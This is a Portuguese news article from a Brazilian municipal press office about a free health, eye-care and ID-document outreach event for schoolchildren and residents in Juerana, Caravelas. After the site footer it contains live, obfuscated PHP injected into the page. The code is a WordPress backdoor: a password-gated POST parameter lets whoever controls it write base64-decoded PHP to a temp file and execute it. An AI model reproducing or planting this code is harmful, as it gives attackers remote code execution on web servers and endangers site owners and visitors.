• SEJA BEM-VINDO

Moradores de Juerana recebem atendimentos oftalmológicos, de especialidades de saúde e serviços sociais

Publicado em: 01/07/2022 Atualizado:: julho 1, 2022

 

Os atendimentos aconteceram nesta quarta-feira (29), na Escola Municipal Júlio Gerônimo, em Juerana

 

Nessa ação foram realizados 300 atendimentos oftalmológicos, 200 serviços sociais e de cidadania – atualização do Cadastro Único (100) e emissão de RG e segunda via de CPF (100) – e mais 1.450 outros serviços em diversas especialidades de saúde: médico pediatra (100), médico clínico geral (200), dentista (50), psicólogo (100), nutricionista (100), atendimento de enfermagem (500), exames laboratoriais (300) e testes rápidos (100).

 

Atendimento odontológico no mutirão Nosso Povo, Nossa Riqueza de Juerana

 

No total foram realizados 1.950 em Juerana. Com 1.250 atendimentos realizados em Rancho Alegre, já chegam à 3.200 o número de pessoas atendidas através do Nosso Povo, Nossa Riqueza, projeto que está cuidando e tratando da visão, da saúde e da cidadania de alunos da rede pública municipal de ensino de todo o município de Caravelas.

 

De acordo com a Secretária de Assistência Social e Cidadania, Ayna de Souza, “o município de Caravelas está oferecendo, junto com os serviços de saúde do mutirão, atendimentos à beneficiários de programas sociais, vinculados ao CadÚnico, e a emissão de identidade, com fotografia gratuita, e segunda via do CPF”, disse.

 

Nutricionista atendendo aluno da rede pública de ensino do município de Caravelas, durante o Mutirão Nosso Povo, Nossa Riqueza, em Juerana

 

Algodão doce e outras guloseimas servidas durante o Mutirão Nosso Povo, Nossa Riqueza de Juerana

 

Segundo a Secretária de Educação, Jocivânia Caetano, “uma grande estrutura tem sido montada em escolas municipais dos distritos, com disponibilidade de lanches, pipoca, algodão doce e brinquedos pula-pula, afim de tornar a experiência das crianças mais agradáveis e prazerosas, enquanto são atendidos”, explicou.

 

Rosimeire Costa dos Santos (moradora de Juerana)

 

Uma satisfação grande para Dona Rosimeire Costa dos Santos. “Estou achando bom demais, porque facilita pra nós, moradores de Juerana, sermos atendidos e muito bem atendidos por vários médicos, dentista, psicólogo e vários outros profissionais de saúde, sem precisar sair daqui pra outros lugares”, destacou.

 

Eliete Mateus dos Santos (moradora de Juerana)

 

Para Dona Eliete Mateus dos Santos, “o fato de ser gratuito, ajuda quem não tem condição de pagar pelos serviços de um médico especialista, um oftalmologista, um pediatra, um dentista e vários outros profissionais de saúde, contribuindo muito para melhorar a qualidade da saúde da população, principalmente, de quem mais precisa”, argumentou.

 

Edilene da Silva Germano (moradora de Juerana)

 

Outra dona de casa, Edilene da Silva Germano, também gostou muito da facilidade do mutirão. “É uma oportunidade que traz vários serviços para perto, facilitando o acesso e os atendimentos em várias especialidades de saúde, sem longas filas, sem dificuldade nenhuma, então, tá bom demais”, parabenizou.

 

Fernanda Cajá Silvestre (moradora de Juerana)

 

Feliz demais, Dona Fernanda Cajá Silvestre, aproveitou para levar suas filhas no atendimento com o médico pediatra, médico oftalmologista, psicólogo e exames laboratoriais e ficou impressionada. “Uma ação assim ajuda muita gente. Minhas filhas, inclusive, estão tendo a oportunidade de serem atendidas sem precisar, madrugar, sem pegar fila com dias de espera, sem precisar sair da localidade onde moram e com muitos serviços num só lugar e de uma única vez, já pensou em algo assim?”, perguntou.

 

Secretária de Saúde de Caravelas, Marina Ramalho

 

Para a Secretaria de Saúde, Marina Ramalho, “uma ação assim representa um grande investimento de recursos públicos na prevenção de doenças, na busca de uma vida saudável e na melhoria da qualidade das pessoas, demonstrando uma grande sensibilidade com a gestão pública e, sobretudo, com as pessoas que mais precisam”, falou emocionada.

 

 

 

 

…………………………………………………

 

Fonte: Ascom/Diógenes Marques

 


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}